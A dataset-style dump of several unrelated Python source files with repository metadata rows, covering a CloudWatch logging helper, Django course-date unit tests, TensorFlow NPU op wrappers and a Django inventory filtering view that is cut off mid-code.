| 31.451613 | 112 | 0.675751 | 783 | 6,825 | 5.773946 | 0.205619 | 0.084052 | 0.029197 | 0.024773 | 0.782791 | 0.761115 | 0.761115 | 0.738996 | 0.722628 | 0.722628 | 0 | 0.007718 | 0.202637 | 6,825 | 217 | 113 | 31.451613 | 0.823043 | 0.069011 | 0 | 0.856061 | 0 | 0 | 0.117358 | 0.040056 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030303 | false | 0 | 0.037879 | 0 | 0.068182 | 0.075758 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
aa98dc8a73ac60c704da20d603a503d790b1f93f | 537 | py | Python | tests/test_impact_stats.py | natcap/opal | 7b960d51344483bae30d14ccfa6004bd550f3737 | [
"BSD-3-Clause"
] | 1 | 2020-04-15T23:23:27.000Z | 2020-04-15T23:23:27.000Z | tests/test_impact_stats.py | natcap/opal | 7b960d51344483bae30d14ccfa6004bd550f3737 | [
"BSD-3-Clause"
] | null | null | null | tests/test_impact_stats.py | natcap/opal | 7b960d51344483bae30d14ccfa6004bd550f3737 | [
"BSD-3-Clause"
] | null | null | null | from adept import static_maps
if __name__ == '__main__':
stats = static_maps.compute_impact_stats(
'/home/jadoug06/workspace/invest-natcap.permitting/ignore_me/sediment_map_quality/bare/watershed_40/random_impact_0',
'sediment',
'/home/jadoug06/workspace/invest-natcap.permitting/ignore_me/sediment_map_quality/bare/watershed_vectors/feature_40.shp',
5,
'/home/jadoug06/workspace/invest-natcap.permitting/ignore_me/sediment_map_quality/bare/watershed_40/watershed_lulc.tif')
    print(stats)
| 44.75 | 129 | 0.769088 | 69 | 537 | 5.57971 | 0.492754 | 0.093506 | 0.163636 | 0.21039 | 0.649351 | 0.649351 | 0.649351 | 0.649351 | 0.649351 | 0.649351 | 0 | 0.029851 | 0.126629 | 537 | 11 | 130 | 48.818182 | 0.791045 | 0 | 0 | 0 | 0 | 0.333333 | 0.679702 | 0.649907 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.111111 | null | null | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
aab450edb54fecbaa8f47b8dd83fee30ef31b389 | 2,818 | py | Python | eksupdate/src/ekslogs.py | aws-samples/amazon-eks-one-click-cluster-upgrade | b9fcddfe0acb45a0d400177141603962a9ba322e | [
"MIT-0"
] | 26 | 2021-11-29T17:54:59.000Z | 2022-03-28T10:00:11.000Z | eksupdate/src/ekslogs.py | aws-samples/amazon-eks-one-click-cluster-upgrade | b9fcddfe0acb45a0d400177141603962a9ba322e | [
"MIT-0"
] | null | null | null | eksupdate/src/ekslogs.py | aws-samples/amazon-eks-one-click-cluster-upgrade | b9fcddfe0acb45a0d400177141603962a9ba322e | [
"MIT-0"
] | 2 | 2021-12-03T19:10:54.000Z | 2022-02-08T09:34:57.000Z | import boto3
import time
# commented out for enhancements
# def log_creator(regionName,cluster_name):
# logs = boto3.client('logs',region_name=regionName)
# LOG_GROUP = 'cluster-' + cluster_name + '-' + regionName
# LOG_STREAM = cluster_name + '-' + regionName + '-'+'eks-update-logs-streams'
# is_exist_group = len(logs.describe_log_groups(
# logGroupNamePrefix=LOG_GROUP,
# ).get('logGroups')) > 0
# if not is_exist_group:
# logs.create_log_group(logGroupName=LOG_GROUP)
# is_stream_existing = len(logs.describe_log_streams(
# logGroupName=LOG_GROUP,
# logStreamNamePrefix=LOG_STREAM
# )['logStreams']
# ) > 0
# if not is_stream_existing:
# logs.create_log_stream(logGroupName=LOG_GROUP,
# logStreamName=LOG_STREAM)
# response = logs.describe_log_streams(
# logGroupName=LOG_GROUP,
# logStreamNamePrefix=LOG_STREAM
# )
def logs_pusher(regionName,cluster_name,msg):
logs = boto3.client('logs',region_name=regionName)
LOG_GROUP = 'cluster-' + cluster_name + '-' + regionName
LOG_STREAM = cluster_name + '-' + regionName + '-'+'eks-update-logs-streams'
is_exist_group = len(logs.describe_log_groups(
logGroupNamePrefix=LOG_GROUP,
).get('logGroups')) > 0
if not is_exist_group:
logs.create_log_group(logGroupName=LOG_GROUP)
is_stream_existing = len(logs.describe_log_streams(
logGroupName=LOG_GROUP,
logStreamNamePrefix=LOG_STREAM
)['logStreams']
) > 0
if not is_stream_existing:
logs.create_log_stream(logGroupName=LOG_GROUP,
logStreamName=LOG_STREAM)
    response = logs.describe_log_streams(
logGroupName=LOG_GROUP,
logStreamNamePrefix=LOG_STREAM
)
try:
timestamp = int(round(time.time() * 1000))
event_log = {
'logGroupName': LOG_GROUP,
'logStreamName': LOG_STREAM,
'logEvents': [
{
'timestamp': timestamp,
'message': str(msg)
}], }
if 'uploadSequenceToken' in response['logStreams'][0]:
event_log.update({'sequenceToken': response['logStreams'][0] ['uploadSequenceToken']})
response = logs.put_log_events(**event_log)
except Exception as e:
timestamp = int(round(time.time() * 1000))
event_log = {
'logGroupName': LOG_GROUP,
'logStreamName': LOG_STREAM,
'logEvents': [
{
'timestamp': timestamp,
'message': str(msg)
}], }
event_log.update({'sequenceToken': str(e).split(" ")[-1]})
response = logs.put_log_events(**event_log)
return
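CloudWatch Logs expects each event's `timestamp` in milliseconds since the epoch, which is why `logs_pusher` multiplies `time.time()` by 1000 before rounding. A minimal check of that conversion:

```python
import time

# CloudWatch Logs wants millisecond-precision epoch timestamps.
timestamp = int(round(time.time() * 1000))
print(len(str(timestamp)))  # 13 digits for current dates
```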
| 32.767442 | 98 | 0.608588 | 284 | 2,818 | 5.757042 | 0.214789 | 0.078287 | 0.122324 | 0.044037 | 0.824465 | 0.824465 | 0.824465 | 0.785321 | 0.785321 | 0.785321 | 0 | 0.008811 | 0.275018 | 2,818 | 85 | 99 | 33.152941 | 0.791483 | 0.311923 | 0 | 0.44898 | 0 | 0 | 0.126239 | 0.011998 | 0 | 0 | 0 | 0 | 0 | 1 | 0.020408 | false | 0 | 0.040816 | 0 | 0.081633 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
aabeac65b7ab2d6b3b2ebad791c71667e44e5c59 | 121 | py | Python | GrADim/__init__.py | cs107-i-m-i-m/cs107-FinalProject | 9b6c0b83cb3f4da7a29973179c3529b829c20c96 | [
"MIT"
] | null | null | null | GrADim/__init__.py | cs107-i-m-i-m/cs107-FinalProject | 9b6c0b83cb3f4da7a29973179c3529b829c20c96 | [
"MIT"
] | null | null | null | GrADim/__init__.py | cs107-i-m-i-m/cs107-FinalProject | 9b6c0b83cb3f4da7a29973179c3529b829c20c96 | [
"MIT"
] | null | null | null | from GrADim.forward_mode import ForwardMode
from GrADim.GrADim import Gradim
from GrADim.reverse_mode import ReverseMode
| 30.25 | 43 | 0.876033 | 17 | 121 | 6.117647 | 0.470588 | 0.288462 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.099174 | 121 | 3 | 44 | 40.333333 | 0.954128 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2ac634fdccf1c087931eb1cd84282d03e07d6716 | 246 | py | Python | deepr/examples/movielens/layers/__init__.py | drohde/deepr | 672772ea3ce9cf391f9f8efc7ae9c9d438957817 | [
"Apache-2.0"
] | null | null | null | deepr/examples/movielens/layers/__init__.py | drohde/deepr | 672772ea3ce9cf391f9f8efc7ae9c9d438957817 | [
"Apache-2.0"
] | null | null | null | deepr/examples/movielens/layers/__init__.py | drohde/deepr | 672772ea3ce9cf391f9f8efc7ae9c9d438957817 | [
"Apache-2.0"
] | null | null | null | # pylint: disable=unused-import,missing-docstring
from deepr.examples.movielens.layers.loss import BPRLoss
from deepr.examples.movielens.layers.transformer import TransformerModel
from deepr.examples.movielens.layers.average import AverageModel
| 41 | 72 | 0.861789 | 30 | 246 | 7.066667 | 0.566667 | 0.127358 | 0.240566 | 0.367925 | 0.45283 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.065041 | 246 | 5 | 73 | 49.2 | 0.921739 | 0.191057 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2af5ccf2e682803ae39882c32baea4e080c0299c | 7,620 | py | Python | tests/apps/courses/test_models_course_glimpse_date.py | lunika/richie | b0b04d0ffc0b16f2f1b8a8201418b8f86941e45f | [
"MIT"
] | null | null | null | tests/apps/courses/test_models_course_glimpse_date.py | lunika/richie | b0b04d0ffc0b16f2f1b8a8201418b8f86941e45f | [
"MIT"
] | null | null | null | tests/apps/courses/test_models_course_glimpse_date.py | lunika/richie | b0b04d0ffc0b16f2f1b8a8201418b8f86941e45f | [
"MIT"
] | null | null | null | """
Unit tests for the Course model
"""
from datetime import timedelta
from django.test import TestCase
from django.utils import timezone
from richie.apps.courses.factories import CourseFactory, CourseRunFactory
class CourseRunModelsTestCase(TestCase):
"""
Unit test suite for computing a date to display on the course glimpse depending on the state
of its related course runs:
0: a run is on-going and open for enrollment > "closing on": {enrollment_end_date}
1: a run is future and open for enrollment > "starting on": {start_date}
2: a run is future and not yet open or already closed for enrollment >
"starting on": {start_date}
3: a run is on-going but closed for enrollment > "on going": {None}
4: there's a finished run in the past > "archived": {None}
5: there are no runs at all > "coming soon": {None}
"""
def setUp(self):
super().setUp()
self.now = timezone.now()
def create_run_ongoing_closed(self, course):
"""Create an on-going course run that is closed for enrollment."""
return CourseRunFactory(
course=course,
start=self.now - timedelta(hours=1),
end=self.now + timedelta(hours=1),
enrollment_end=self.now - timedelta(hours=1),
)
def create_run_archived(self, course):
"""Create an archived course run."""
return CourseRunFactory(
course=course, start=self.now - timedelta(hours=1), end=self.now
)
def create_run_future_not_yet_open(self, course):
"""Create a course run in the future and not yet open for enrollment."""
return CourseRunFactory(
course=course,
start=self.now + timedelta(hours=2),
enrollment_start=self.now + timedelta(hours=1),
)
def create_run_future_closed(self, course):
"""Create a course run in the future and already closed for enrollment."""
return CourseRunFactory(
course=course,
start=self.now + timedelta(hours=1),
enrollment_start=self.now - timedelta(hours=2),
enrollment_end=self.now - timedelta(hours=1),
)
def create_run_future_open(self, course):
"""Create a course run in the future and open for enrollment."""
return CourseRunFactory(
course=course,
start=self.now + timedelta(hours=1),
enrollment_start=self.now - timedelta(hours=1),
enrollment_end=self.now + timedelta(hours=1),
)
def test_models_course_glimpse_info_coming_soon(self):
"""
Confirm glimpse datetime result when there is no course runs at all.
"""
course = CourseFactory()
with self.assertNumQueries(2):
glimpse_info = course.glimpse_info
self.assertEqual(
glimpse_info, {"cta": None, "datetime": None, "text": "coming soon"}
)
def test_models_course_glimpse_date_archived(self):
"""
Confirm glimpse datetime result when there is a course run only in the past.
"""
course = CourseFactory()
self.create_run_archived(course)
with self.assertNumQueries(2):
glimpse_info = course.glimpse_info
self.assertEqual(
glimpse_info, {"cta": None, "datetime": None, "text": "archived"}
)
def test_models_course_glimpse_date_ongoing_enrollment_closed(self):
"""
Confirm glimpse datetime result when there is an on-going course run but closed for
enrollment.
"""
course = CourseFactory()
self.create_run_ongoing_closed(course)
with self.assertNumQueries(2):
glimpse_info = course.glimpse_info
self.assertEqual(
glimpse_info, {"cta": None, "datetime": None, "text": "on-going"}
)
def test_models_course_glimpse_date_future_enrollment_not_yet_open(self):
"""
Confirm glimpse datetime result when there is a future course run but not yet open for
enrollment.
"""
course = CourseFactory()
course_run = self.create_run_future_not_yet_open(course)
with self.assertNumQueries(2):
glimpse_info = course.glimpse_info
expected_glimpse = {
"cta": None,
"datetime": course_run.start,
"text": "starting on",
}
self.assertEqual(glimpse_info, expected_glimpse)
# Adding an on-going but closed course run should not change the result
self.create_run_ongoing_closed(course)
with self.assertNumQueries(1):
glimpse_info = course.glimpse_info
self.assertEqual(glimpse_info, expected_glimpse)
def test_models_course_glimpse_date_future_enrollment_closed(self):
"""
Confirm glimpse datetime result when there is a future course run but closed for
enrollment.
"""
course = CourseFactory()
course_run = self.create_run_future_closed(course)
with self.assertNumQueries(2):
glimpse_info = course.glimpse_info
expected_glimpse = {
"cta": None,
"datetime": course_run.start,
"text": "starting on",
}
self.assertEqual(glimpse_info, expected_glimpse)
# Adding an on-going but closed course run should not change the result
self.create_run_ongoing_closed(course)
with self.assertNumQueries(1):
glimpse_info = course.glimpse_info
self.assertEqual(glimpse_info, expected_glimpse)
def test_models_course_glimpse_date_future_enrollment_open(self):
"""
Confirm glimpse datetime result when there is a future course run open for enrollment.
"""
course = CourseFactory()
course_run = self.create_run_future_open(course)
with self.assertNumQueries(2):
glimpse_info = course.glimpse_info
expected_glimpse = {
"cta": "enroll now",
"datetime": course_run.start,
"text": "starting on",
}
self.assertEqual(glimpse_info, expected_glimpse)
# Adding courses in less priorietary states should not change the result
self.create_run_ongoing_closed(course)
self.create_run_future_closed(course)
with self.assertNumQueries(1):
glimpse_info = course.glimpse_info
self.assertEqual(glimpse_info, expected_glimpse)
def test_models_course_glimpse_date_ongoing_open(self):
"""
Confirm glimpse datetime result when there is an on-going course run open for enrollment.
"""
course = CourseFactory()
course_run = CourseRunFactory(
course=course,
start=self.now - timedelta(hours=1),
end=self.now + timedelta(hours=2),
enrollment_end=self.now + timedelta(hours=1),
)
with self.assertNumQueries(2):
glimpse_info = course.glimpse_info
expected_glimpse = {
"cta": "enroll now",
"datetime": course_run.enrollment_end,
"text": "closing on",
}
self.assertEqual(glimpse_info, expected_glimpse)
# Adding courses in less priorietary states should not change the result
self.create_run_ongoing_closed(course)
self.create_run_future_closed(course)
self.create_run_future_open(course)
with self.assertNumQueries(1):
glimpse_info = course.glimpse_info
self.assertEqual(glimpse_info, expected_glimpse)
| 38.291457 | 97 | 0.637402 | 893 | 7,620 | 5.254199 | 0.115342 | 0.07971 | 0.051151 | 0.067136 | 0.835891 | 0.802856 | 0.777067 | 0.76428 | 0.735294 | 0.696505 | 0 | 0.005823 | 0.278871 | 7,620 | 198 | 98 | 38.484848 | 0.848044 | 0.235564 | 0 | 0.607692 | 0 | 0 | 0.035091 | 0 | 0 | 0 | 0 | 0 | 0.169231 | 1 | 0.1 | false | 0 | 0.030769 | 0 | 0.176923 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
630c7f6d05617b51a31a1d2c3f8e9ca321fb9bb4 | 2,467 | py | Python | tf_adapter/python/npu_bridge/tbe/npu_vector_ops.py | Huawei-Ascend/tensorflow | 67979f8cf1acbb6db6b156ee0a15d277571d4a03 | [
"Apache-2.0"
] | 1 | 2021-04-10T03:28:50.000Z | 2021-04-10T03:28:50.000Z | tf_adapter/python/npu_bridge/tbe/npu_vector_ops.py | Huawei-Ascend/tensorflow | 67979f8cf1acbb6db6b156ee0a15d277571d4a03 | [
"Apache-2.0"
] | null | null | null | tf_adapter/python/npu_bridge/tbe/npu_vector_ops.py | Huawei-Ascend/tensorflow | 67979f8cf1acbb6db6b156ee0a15d277571d4a03 | [
"Apache-2.0"
] | null | null | null | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Copyright (C) 2019-2020. Huawei Technologies Co., Ltd. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Ops for aicore cube."""
from tensorflow import Tensor
from tensorflow.python.eager import context
from npu_bridge.helper import helper
gen_npu_ops = helper.get_gen_ops()
def lamb_apply_optimizer_assign(input0, input1, input2, input3, mul0_x, mul1_x,
mul2_x, mul3_x, add2_y, steps, do_use_weight, weight_decay_rate, name=None):
if context.executing_eagerly():
raise RuntimeError("tf.lamb_apply_optimizer_assign() is not compatible with "
"eager execution.")
update, nextv, nextm = gen_npu_ops.lamb_apply_optimizer_assign(input0, input1, input2, input3, mul0_x, mul1_x, mul2_x,
mul3_x, add2_y, steps, do_use_weight, weight_decay_rate, name)
return update, nextv, nextm
def lamb_apply_weight_assign(input0, input1, input2, input3, input4, name=None):
if context.executing_eagerly():
raise RuntimeError("tf.lamb_apply_weight_assign() is not compatible with "
"eager execution.")
result = gen_npu_ops.lamb_apply_weight_assign(input0, input1, input2, input3, input4, name)
    return result


# File: apps/employees/models/__init__.py (wis-software/office-manager, MIT)
from apps.employees.models.position import Position
from apps.employees.models.specialization import Specialization
from apps.employees.models.employee import Employee

# File: video_production/annotations/team.py (OddballSports-tv/obies-eyes, Apache-2.0)
# imports
from .annotation import Annotation
import cv2


class Team(Annotation):
    def _annotate(self, frame, team=None, *args, **kwargs):
        return frame


# File: inventory/views.py (Kgford/TCLI, BSD-3-Clause)
from django import forms
import json
from django.shortcuts import render
from django.http import HttpResponseRedirect
from django.http import JsonResponse
from django.core import serializers
from .forms import InventoryForm
from datetime import date
from django.urls import reverse, reverse_lazy
from equipment.models import Model
from locations.models import Location
from inventory.models import Inventory, Events
from django.views import View
import datetime
from django.contrib.auth.decorators import login_required
# Create your views here.
class InventoryView(View):
    # The commented-out items.csv/events.csv bootstrap blocks that used to live
    # here duplicated the module-level load_iventory_csv()/load_events_csv()
    # helpers defined below. The one-off locations.csv loader is kept for
    # reference:
    '''
    import csv
    timestamp = date.today()
    CSV_PATH = 'locations.csv'
    print('csv = ', CSV_PATH)
    contSuccess = 0
    # Remove all data from Table
    Location.objects.all().delete()
    f = open(CSV_PATH)
    reader = csv.reader(f)
    print('reader = ', reader)
    for name, address, city, state, zip_code, phone, email, website, lat, lng, created_on, last_entry in reader:
        if lat == "":
            lat = 40.815320
        if lng == "":
            lng = -73.237710
        Location.objects.create(name=name, address=address, city=city, state=state,
                                zip_code=zip_code, phone=phone, email=email, website=website,
                                active=True, lat=float(lat), lng=float(lng),
                                created_on=timestamp, last_entry=timestamp)
        contSuccess += 1
    print(f'{str(contSuccess)} inserted successfully! ')
    '''

    # load_iventory_csv(True)
    # load_events_csv(True)
    form_class = InventoryForm
    template_name = "index.html"
    success_url = reverse_lazy('inventory:inv')
    def get(self, *args, **kwargs):
        form = self.form_class()
        # Defaults so the render call below cannot hit a NameError when the
        # queries in the try block fail.
        description = category = model = status = locationname = shelf = search = -1
        inv = []
        desc_list = models_list = categorys_list = status_list = locations_list = shelves_list = []
        try:
            desc_list = Inventory.objects.order_by('description').values_list('description', flat=True).distinct()
            models_list = Inventory.objects.order_by('modelname').values_list('modelname', flat=True).distinct()
            categorys_list = Inventory.objects.order_by('category').values_list('category', flat=True).distinct()
            status_list = Inventory.objects.order_by('status').values_list('status', flat=True).distinct()
            locations_list = Inventory.objects.order_by('locationname').values_list('locationname', flat=True).distinct()
            shelves_list = Inventory.objects.order_by('shelf').values_list('shelf', flat=True).distinct()
            inv = Inventory.objects.all()
        except IOError as e:
            print("Lists load Failure ", e)
        return render(self.request, "inventory/index.html",
                      {"form": form, "inventory": inv, "desc_list": desc_list, "status_list": status_list,
                       "models_list": models_list, "locations_list": locations_list,
                       "shelves_list": shelves_list, "categorys_list": categorys_list,
                       "index_type": "INVENTORY", 'description': description, 'model': model,
                       'status': status, 'category': category, 'locationname': locationname,
                       'shelf': shelf, 'search': search})
    def post(self, request, *args, **kwargs):
        form = self.form_class()
        # Defaults so the render call below cannot hit a NameError when the
        # queries in the try block fail.
        json_data = []
        inv_list = []
        inv = []
        description = model = status = category = locationname = shelf = search = -1
        desc_list = models_list = categorys_list = status_list = locations_list = shelves_list = []
        try:
            model = request.POST.get('_model', -1)
            description = request.POST.get('_desc', -1)
            status = request.POST.get('_status', -1)
            category = request.POST.get('_category', -1)
            locationname = request.POST.get('_site', -1)
            shelf = request.POST.get('_shelf', -1)
            select = request.POST.get('sel', -1)
            search = request.POST.get('search', -1)
            print_report = request.POST.get('monthly_report', -1)
            success = True
            desc_list = Inventory.objects.order_by('description').values_list('description', flat=True).distinct()
            models_list = Inventory.objects.order_by('modelname').values_list('modelname', flat=True).distinct()
            categorys_list = Inventory.objects.order_by('category').values_list('category', flat=True).distinct()
            status_list = Inventory.objects.order_by('status').values_list('status', flat=True).distinct()
            locations_list = Inventory.objects.order_by('locationname').values_list('locationname', flat=True).distinct()
            shelves_list = Inventory.objects.order_by('shelf').values_list('shelf', flat=True).distinct()
            if not search == -1:
                inv_list = (Inventory.objects.filter(description__icontains=search)
                            | Inventory.objects.filter(modelname__icontains=search)
                            | Inventory.objects.filter(status__icontains=search)
                            | Inventory.objects.filter(category__icontains=search)
                            | Inventory.objects.filter(locationname__icontains=search)
                            | Inventory.objects.filter(serial_number__contains=search)
                            | Inventory.objects.filter(shelf__icontains=search)).all()
            elif description == "select menu" and model == "select menu" and status == "select menu" and category == "select menu" and locationname == "select menu" and shelf == "select":
                inv_list = Inventory.objects.all()
            elif not category == "select menu":
                if description == "select menu" and model == "select menu" and status == "select menu" and locationname == "select menu" and shelf == "select":  # category only
                    inv_list = Inventory.objects.filter(category=category).all()
                if not model == "select menu" and status == "select menu" and locationname == "select menu" and shelf == "select":  # category & model
                    inv_list = Inventory.objects.filter(category=category, modelname__contains=model).all()
                if not model == "select menu" and not status == "select menu" and locationname == "select menu" and shelf == "select":  # category & model & status
                    inv_list = Inventory.objects.filter(category=category, modelname__contains=model, status__contains=status).all()
                if not model == "select menu" and not status == "select menu" and not locationname == "select menu" and shelf == "select":  # category & model & status & location
                    inv_list = Inventory.objects.filter(category=category, modelname__contains=model, status__contains=status, locationname__contains=locationname).all()
                if not model == "select menu" and not status == "select menu" and not locationname == "select menu" and not shelf == "select":  # category & model & status & location & shelf
                    inv_list = Inventory.objects.filter(category=category, modelname__contains=model, status__contains=status, locationname__contains=locationname, shelf__contains=shelf).all()
                if not model == "select menu" and not status == "select menu" and not locationname == "select menu" and not shelf == "select" and not description == "select menu":  # category & model & status & location & shelf & description
                    inv_list = Inventory.objects.filter(category=category, modelname__contains=model, status__contains=status, locationname__contains=locationname, shelf__contains=shelf, description__icontains=description).all()
            elif not model == "select menu":
                if description == "select menu" and status == "select menu" and category == "select menu" and locationname == "select menu" and shelf == "select":  # model only
                    inv_list = Inventory.objects.filter(modelname__contains=model).all()
                if not category == "select menu" and status == "select menu" and description == "select menu" and locationname == "select menu" and shelf == "select":  # model & category
                    inv_list = Inventory.objects.filter(modelname__icontains=model, category__icontains=category).all()
                if not category == "select menu" and not status == "select menu" and description == "select menu" and locationname == "select menu" and shelf == "select":  # model & category & status
                    inv_list = Inventory.objects.filter(modelname__icontains=model, category=category, status__contains=status).all()
                if not category == "select menu" and not status == "select menu" and not description == "select menu" and locationname == "select menu" and shelf == "select":  # model & category & status & description
                    inv_list = Inventory.objects.filter(modelname__icontains=model, category=category, status__contains=status, description__icontains=description).all()
                if not category == "select menu" and not status == "select menu" and not description == "select menu" and not locationname == "select menu" and shelf == "select":  # model & category & status & description & location
                    inv_list = Inventory.objects.filter(modelname__icontains=model, category=category, status__contains=status, description__icontains=description, locationname__icontains=locationname).all()
                if not category == "select menu" and not status == "select menu" and not description == "select menu" and not locationname == "select menu" and not shelf == "select":  # model & category & status & description & location & shelf
                    inv_list = Inventory.objects.filter(modelname__icontains=model, category__icontains=category, status__contains=status, description__icontains=description, locationname__icontains=locationname, shelf__contains=shelf).all()
            elif not status == "select menu":
                if description == "select menu" and model == "select menu" and category == "select menu" and locationname == "select menu" and shelf == "select":  # status only
                    inv_list = Inventory.objects.filter(status__contains=status).all()
                if not model == "select menu" and category == "select menu" and locationname == "select menu" and shelf == "select":  # status & model
                    inv_list = Inventory.objects.filter(status__contains=status, modelname__contains=model).all()
                if not model == "select menu" and not category == "select menu" and locationname == "select menu" and shelf == "select":  # status & model & category
                    inv_list = Inventory.objects.filter(status__contains=status, modelname__contains=model, category=category).all()
                if not model == "select menu" and not category == "select menu" and not locationname == "select menu" and shelf == "select":  # status & model & category & location
                    inv_list = Inventory.objects.filter(status__contains=status, modelname__contains=model, category=category, locationname__icontains=locationname).all()
                if not model == "select menu" and not category == "select menu" and not locationname == "select menu" and not shelf == "select":  # status & model & category & location & shelf
                    inv_list = Inventory.objects.filter(status__contains=status, modelname__contains=model, category=category, locationname__icontains=locationname, shelf__contains=shelf).all()
                if not model == "select menu" and not category == "select menu" and not locationname == "select menu" and not shelf == "select" and not description == "select menu":  # status & model & category & location & shelf & description
                    inv_list = Inventory.objects.filter(status__contains=status, modelname__contains=model, category=category, locationname__icontains=locationname, shelf__contains=shelf, description__icontains=description).all()
            elif not locationname == "select menu":
                if description == "select menu" and model == "select menu" and status == "select menu" and category == "select menu" and shelf == "select":  # location only
                    inv_list = Inventory.objects.filter(locationname__contains=locationname).all()
                if not shelf == "select" and status == "select menu" and category == "select menu" and model == "select menu":  # location & shelf
                    inv_list = Inventory.objects.filter(locationname__contains=locationname, shelf__contains=shelf).all()
                if not shelf == "select" and not status == "select menu" and category == "select menu" and model == "select menu":  # location & shelf & status
                    inv_list = Inventory.objects.filter(locationname__contains=locationname, shelf__contains=shelf, status__contains=status).all()
                if not shelf == "select" and not status == "select menu" and not category == "select menu" and model == "select menu":  # location & shelf & status & category
                    inv_list = Inventory.objects.filter(locationname__contains=locationname, shelf__contains=shelf, status__contains=status, category__contains=category).all()
                if not shelf == "select" and not status == "select menu" and not category == "select menu" and not description == "select menu":  # location & shelf & status & category & description
                    inv_list = Inventory.objects.filter(locationname__contains=locationname, shelf__contains=shelf, description__contains=description, status__contains=status, category=category).all()
                if not shelf == "select" and not status == "select menu" and not category == "select menu" and not description == "select menu" and not model == "select menu":  # location & shelf & status & category & description & model
                    inv_list = Inventory.objects.filter(locationname__contains=locationname, shelf__contains=shelf, description__contains=description, status__contains=status, category=category, modelname__contains=model).all()
            elif not shelf == "select":
                if description == "select menu" and model == "select menu" and status == "select menu" and category == "select menu" and locationname == "select menu":  # shelf only
                    inv_list = Inventory.objects.filter(shelf__contains=shelf).all()
                if not locationname == "select menu" and status == "select menu" and category == "select menu" and model == "select menu":  # shelf & location
                    inv_list = Inventory.objects.filter(shelf__contains=shelf, locationname__contains=locationname).all()
                if not locationname == "select menu" and not status == "select menu" and category == "select menu" and model == "select menu":  # shelf & location & status
                    inv_list = Inventory.objects.filter(shelf__contains=shelf, locationname__contains=locationname, status__contains=status).all()
                if not locationname == "select menu" and not status == "select menu" and not category == "select menu" and model == "select menu":  # shelf & location & status & category
                    inv_list = Inventory.objects.filter(shelf__contains=shelf, locationname__contains=locationname, category__contains=category, status__contains=status).all()
                if not locationname == "select menu" and not status == "select menu" and not category == "select menu" and not model == "select menu":  # shelf & location & status & category & model
                    inv_list = Inventory.objects.filter(shelf__contains=shelf, locationname__contains=locationname, description__contains=description, status__contains=status, category__contains=category, modelname__contains=model).all()
            elif not description == "select menu":
                if model == "select menu" and status == "select menu" and category == "select menu" and locationname == "select menu" and shelf == "select":  # description only
                    inv_list = Inventory.objects.filter(description__contains=description).all()
                if not model == "select menu" and status == "select menu" and category == "select menu" and locationname == "select menu" and shelf == "select":  # description & model
                    inv_list = Inventory.objects.filter(description__contains=description, modelname__contains=model).all()
                if not model == "select menu" and not status == "select menu" and category == "select menu" and locationname == "select menu" and shelf == "select":  # description & model & status
                    inv_list = Inventory.objects.filter(description__contains=description, modelname__contains=model, status__contains=status).all()
                if not model == "select menu" and not status == "select menu" and not category == "select menu" and locationname == "select menu" and shelf == "select":  # description & model & status & category
                    inv_list = Inventory.objects.filter(description__contains=description, modelname__contains=model, status__contains=status, category__contains=category).all()
                if not model == "select menu" and not status == "select menu" and not category == "select menu" and not locationname == "select menu" and shelf == "select":  # description & model & status & category & location
